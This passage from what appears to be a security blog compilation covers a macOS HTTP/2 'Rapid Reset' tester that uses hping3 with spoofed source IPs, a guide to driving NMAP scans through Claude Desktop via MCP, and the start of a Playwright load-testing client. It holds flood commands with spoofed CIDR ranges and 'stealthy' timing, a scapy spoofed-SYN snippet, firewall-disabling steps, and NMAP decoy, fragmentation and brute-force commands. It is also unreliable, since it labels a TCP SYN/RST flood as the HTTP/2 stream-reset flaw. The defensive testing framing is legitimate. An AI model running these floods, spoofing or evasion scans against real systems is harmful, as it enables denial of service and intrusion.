    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify the interface explicitly with --interface (passed to hping3 as the -I flag)

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
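
For comparison, here is roughly what hping3 does under the hood, sketched with the Python scapy library (pip install scapy, run as root). The addresses are placeholders:

from scapy.all import IP, TCP, send

# Craft a SYN with an arbitrary (spoofed) source address; the kernel's
# normal TCP stack, which would insist on a real local address, is bypassed.
spoofed = IP(src="192.168.1.50", dst="test.example.com") / TCP(dport=443, flags="S")
send(spoofed, verbose=False)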

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

Additional Resources


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.


macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt update
sudo apt install -y nmap

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

macOS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
    config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Scanning (EternalBlue)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerability Checks

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Email Server Security Assessment

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: NMAP has no dedicated XXE detection script in its default distribution, so this runs a related web-framework vulnerability check (Apache Struts CVE-2017-5638) as a starting point; thorough XXE testing usually requires a dedicated web scanner or manual probing.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script ftp-vsftpd-backdoor,ftp-proftpd-backdoor,irc-unrealircd-backdoor,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces
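
An illustrative starting sweep for the ports these device classes commonly expose (RTSP 554 for cameras, 9100/515/631 for printers, 5000 for many NAS web UIs):

nmap -sV -p 80,443,515,554,631,5000,8080,9100 192.168.1.0/24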

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.
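
Expected commands (a minimal sketch; -F restricts the scan to the 100 most common ports so the timing difference shows up quickly):

time nmap -T2 -F example-target.com
time nmap -T4 -F example-target.com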

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!
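
Before writing the Lua, it helps to pin down the detection logic. A minimal sketch in shell (the /debug endpoint and port come from the scenario above; the "db_password" marker is a hypothetical indicator string):

# Flag the host if /debug answers 200 without credentials and leaks config
code=$(curl -s -o /tmp/debug_body -w '%{http_code}' http://target-host:8080/debug)
if [ "$code" = "200" ] && grep -q "db_password" /tmp/debug_body; then
  echo "VULNERABLE: /debug exposes configuration without authentication"
fi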

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected commands:

nmap -oA scan_results example-target.com       # writes normal (.nmap), XML (.xml), and grepable (.gnmap)
nmap -oS scan_results.skid example-target.com  # the "script kiddie" format needs its own -oS flag

Claude can then help you parse the XML file programmatically.
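
For example, a one-liner to pull the open port numbers out of the XML (assuming xmllint from libxml2 is installed):

xmllint --xpath '//port[state/@state="open"]/@portid' scan_results.xml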

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
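
One way to implement the baseline-and-diff loop (ndiff ships alongside NMAP; the cron schedule is an example):

# Create the baseline once
nmap -oX baseline.xml example-target.com

# weekly_scan.sh: rescan and report differences against the baseline
nmap -oX latest.xml example-target.com
ndiff baseline.xml latest.xml

# Example crontab entry: every Monday at 03:00
# 0 3 * * 1 /path/to/weekly_scan.sh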

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0


Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
